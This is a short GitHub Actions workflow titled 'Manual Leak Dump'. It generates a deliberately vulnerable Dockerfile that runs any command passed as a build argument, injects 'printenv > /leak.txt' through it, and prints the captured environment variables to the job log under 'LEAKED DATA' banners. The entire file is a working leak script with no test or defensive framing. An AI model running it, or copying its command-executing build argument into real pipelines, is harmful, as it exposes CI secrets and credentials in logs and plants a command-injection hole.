name: Manual Leak Dump

on:
  workflow_dispatch:

jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Create vulnerable Dockerfile
        run: |
          cat <<EOF > Dockerfile
          FROM alpine
          ARG CMD
          RUN /bin/sh -c "\$CMD"
          EOF

      - name: Build Docker image with leak payload
        run: |
          docker build \
            --build-arg CMD='printenv > /leak.txt' \
            -t envleak .

      - name: Extract env vars from container
        run: |
          docker run --rm envleak cat /leak.txt > leaked_envs.txt
          echo "------ BEGIN LEAKED DATA ------"
          cat leaked_envs.txt
          echo "------ END LEAKED DATA ------"
